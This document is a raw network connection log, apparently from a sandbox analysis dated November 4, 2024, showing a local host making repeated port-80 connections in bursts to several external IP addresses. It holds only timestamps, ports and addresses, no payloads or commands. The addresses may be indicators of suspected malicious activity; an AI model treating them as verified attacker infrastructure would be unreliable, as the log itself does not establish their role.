Nov 4, 2024 10:12:19.672627926 CET	80	50024	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.686837912 CET	50025	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:20.691951036 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.692033052 CET	50025	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:20.704643965 CET	50025	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:20.709695101 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.709734917 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.709738970 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.710407019 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.710412025 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.710422039 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.710424900 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.710433960 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:20.710438013 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:21.498322964 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:21.498423100 CET	50025	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:22.217689991 CET	50025	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:22.222579002 CET	80	50025	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:23.235872984 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:23.240921974 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:23.241012096 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:23.251815081 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:23.509701014 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065368891 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065390110 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065401077 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065412045 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065432072 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065442085 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065459967 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065522909 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.065557003 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.065623999 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065634966 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065655947 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.065660954 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.065697908 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.070408106 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.120718002 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.177874088 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:24.177997112 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.179819107 CET	50026	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:24.185534954 CET	80	50026	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:29.207210064 CET	50027	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:29.212212086 CET	80	50027	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:29.216190100 CET	50027	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:29.227746964 CET	50027	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:29.232641935 CET	80	50027	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:29.937017918 CET	80	50027	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:29.975132942 CET	80	50027	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:29.975186110 CET	50027	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:30.731621981 CET	50027	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:31.750062943 CET	50028	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:31.755156040 CET	80	50028	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:31.755223989 CET	50028	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:31.770297050 CET	50028	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:31.775321007 CET	80	50028	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:33.277137041 CET	50028	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:33.282630920 CET	80	50028	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:33.285736084 CET	50028	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:34.296379089 CET	50029	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:34.301287889 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.301352978 CET	50029	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:34.316119909 CET	50029	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:34.321126938 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321177006 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321182013 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321192026 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321209908 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321213961 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321278095 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321281910 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.321324110 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:34.993571997 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:35.031306982 CET	80	50029	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:35.032476902 CET	50029	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:35.824177027 CET	50029	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:36.843734026 CET	50030	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:36.848526955 CET	80	50030	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:36.855943918 CET	50030	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:36.863676071 CET	50030	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:36.868829012 CET	80	50030	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:37.548274994 CET	80	50030	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:37.586769104 CET	80	50030	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:37.587933064 CET	50030	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:37.591609001 CET	50030	80	192.168.2.4	162.0.231.203
Nov 4, 2024 10:12:37.596465111 CET	80	50030	162.0.231.203	192.168.2.4
Nov 4, 2024 10:12:43.075297117 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:43.080465078 CET	80	50031	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:43.080708027 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:43.092669964 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:43.098714113 CET	80	50031	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:43.965040922 CET	80	50031	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:43.965118885 CET	80	50031	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:43.965128899 CET	80	50031	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:43.965166092 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:44.011420965 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:44.110845089 CET	80	50031	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:44.110897064 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:44.605267048 CET	50031	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:45.627862930 CET	50032	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:45.633378983 CET	80	50032	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:45.635782003 CET	50032	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:45.647862911 CET	50032	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:45.653712988 CET	80	50032	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:46.548057079 CET	80	50032	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:46.548064947 CET	80	50032	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:46.548134089 CET	50032	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:46.685547113 CET	80	50032	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:46.685600996 CET	50032	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:47.152118921 CET	50032	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:48.171715021 CET	50033	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:48.176731110 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.176794052 CET	50033	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:48.190875053 CET	50033	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:48.195779085 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195797920 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195806980 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195825100 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195833921 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195852995 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195863962 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.195983887 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:48.196027040 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:49.047112942 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:49.047303915 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:49.047308922 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:49.047482967 CET	50033	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:49.189408064 CET	80	50033	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:49.189546108 CET	50033	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:49.699064970 CET	50033	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:50.718262911 CET	50034	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:50.723167896 CET	80	50034	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:50.723237991 CET	50034	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:50.732224941 CET	50034	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:50.737174034 CET	80	50034	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:51.582786083 CET	80	50034	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:51.582798958 CET	80	50034	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:51.585839033 CET	50034	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:51.719789028 CET	80	50034	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:51.720801115 CET	50034	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:51.723671913 CET	50034	80	192.168.2.4	150.95.254.16
Nov 4, 2024 10:12:51.737556934 CET	80	50034	150.95.254.16	192.168.2.4
Nov 4, 2024 10:12:56.771519899 CET	50035	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:56.776418924 CET	80	50035	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:56.776496887 CET	50035	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:56.792522907 CET	50035	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:56.797681093 CET	80	50035	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:58.308367968 CET	50035	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:58.313643932 CET	80	50035	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:58.313690901 CET	50035	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:59.329735994 CET	50036	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:59.334603071 CET	80	50036	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:59.334727049 CET	50036	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:59.346471071 CET	50036	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:59.351341009 CET	80	50036	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:59.961657047 CET	80	50036	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:59.961740017 CET	50036	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:00.855837107 CET	50036	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:00.860631943 CET	80	50036	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.875571012 CET	50037	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:01.880769968 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.880850077 CET	50037	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:01.905317068 CET	50037	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:01.910276890 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910300970 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910355091 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910365105 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910382032 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910393000 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910427094 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910437107 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:01.910446882 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:03.418080091 CET	50037	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:03.424696922 CET	80	50037	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:03.424887896 CET	50037	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:04.466332912 CET	50038	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:04.471262932 CET	80	50038	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:04.471344948 CET	50038	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:04.536524057 CET	50038	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:04.542395115 CET	80	50038	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:12.176579952 CET	80	50038	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:12.177172899 CET	80	50038	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:12.177217960 CET	50038	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:12.179804087 CET	50038	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:13:12.184577942 CET	80	50038	3.33.130.190	192.168.2.4
Nov 4, 2024 10:13:17.305697918 CET	50039	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:17.313232899 CET	80	50039	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:17.313600063 CET	50039	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:17.325706959 CET	50039	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:17.330733061 CET	80	50039	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:17.958456993 CET	80	50039	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:17.958533049 CET	80	50039	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:17.958576918 CET	50039	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:17.959069967 CET	80	50039	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:17.959114075 CET	50039	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:18.839982033 CET	50039	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:19.859992981 CET	50040	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:19.865432024 CET	80	50040	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:19.865506887 CET	50040	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:19.879949093 CET	50040	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:19.885241985 CET	80	50040	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:20.518059015 CET	80	50040	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:20.518219948 CET	80	50040	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:20.518297911 CET	50040	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:20.518577099 CET	80	50040	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:20.518652916 CET	50040	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:21.389807940 CET	50040	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:22.405998945 CET	50041	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:22.772861004 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.773056984 CET	50041	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:22.784719944 CET	50041	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:22.789805889 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.789982080 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.789988995 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.790000916 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.790007114 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.790016890 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.790113926 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.790117979 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:22.790122032 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:23.438755035 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:23.438774109 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:23.439512968 CET	80	50041	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:23.439968109 CET	50041	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:24.292857885 CET	50041	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:25.311808109 CET	50042	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:25.317235947 CET	80	50042	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:25.317431927 CET	50042	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:25.325371981 CET	50042	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:25.330451012 CET	80	50042	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:26.300266027 CET	80	50042	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:26.300355911 CET	80	50042	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:26.300451994 CET	50042	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:26.301306009 CET	80	50042	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:26.301352024 CET	50042	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:26.303957939 CET	50042	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:13:26.308804989 CET	80	50042	199.59.243.227	192.168.2.4
Nov 4, 2024 10:13:31.480101109 CET	50043	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:31.484958887 CET	80	50043	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:31.485882044 CET	50043	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:31.497531891 CET	50043	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:31.503119946 CET	80	50043	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:32.334312916 CET	80	50043	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:32.386564016 CET	50043	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:32.465926886 CET	80	50043	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:32.465985060 CET	50043	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:33.011584044 CET	50043	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:34.031435013 CET	50044	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:34.037636995 CET	80	50044	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:34.037723064 CET	50044	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:34.051765919 CET	50044	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:34.056694031 CET	80	50044	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:34.922955990 CET	80	50044	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:34.981740952 CET	50044	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:35.050980091 CET	80	50044	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:35.051162004 CET	50044	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:35.558454037 CET	50044	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:36.577656984 CET	50045	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:36.582516909 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.582582951 CET	50045	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:36.595967054 CET	50045	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:36.600884914 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.600900888 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.600929976 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.600963116 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.601047993 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.601058960 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.601063013 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.601068020 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:36.601078033 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:37.431473017 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:37.485727072 CET	50045	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:37.553992033 CET	80	50045	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:37.554049015 CET	50045	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:38.105482101 CET	50045	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:39.125801086 CET	50046	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:39.130683899 CET	80	50046	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:39.131870985 CET	50046	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:39.139338970 CET	50046	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:39.144293070 CET	80	50046	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:39.985613108 CET	80	50046	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:39.985734940 CET	80	50046	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:39.985829115 CET	50046	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:40.109244108 CET	80	50046	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:40.109342098 CET	50046	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:40.110296011 CET	50046	80	192.168.2.4	217.160.0.111
Nov 4, 2024 10:13:40.115044117 CET	80	50046	217.160.0.111	192.168.2.4
Nov 4, 2024 10:13:45.608084917 CET	50047	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:45.612962008 CET	80	50047	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:45.613847971 CET	50047	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:45.625785112 CET	50047	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:45.630711079 CET	80	50047	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:46.766381979 CET	80	50047	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:46.766436100 CET	50047	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:47.137753963 CET	50047	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:47.142673969 CET	80	50047	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:48.156163931 CET	50048	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:48.161026955 CET	80	50048	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:48.161092997 CET	50048	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:48.176172018 CET	50048	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:48.181072950 CET	80	50048	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:49.304898977 CET	80	50048	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:49.305845976 CET	50048	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:49.683487892 CET	50048	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:49.688478947 CET	80	50048	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.703011990 CET	50049	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:50.707851887 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.707926989 CET	50049	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:50.723597050 CET	50049	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:50.728552103 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728590012 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728621960 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728626013 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728651047 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728655100 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728702068 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728707075 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:50.728713036 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:51.680054903 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:51.683850050 CET	50049	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:52.230551958 CET	50049	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:52.235555887 CET	80	50049	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:53.276170015 CET	50050	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:53.373296022 CET	80	50050	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:53.375962973 CET	50050	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:53.387837887 CET	50050	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:53.392647028 CET	80	50050	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:54.517677069 CET	80	50050	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:54.517791033 CET	50050	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:54.519084930 CET	50050	80	192.168.2.4	168.76.221.252
Nov 4, 2024 10:13:54.524074078 CET	80	50050	168.76.221.252	192.168.2.4
Nov 4, 2024 10:13:59.629169941 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:13:59.634089947 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:13:59.634463072 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:13:59.645554066 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:13:59.650311947 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.640861034 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.640980005 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.641081095 CET	50051	80	192.168.2.4	185.179.189.193
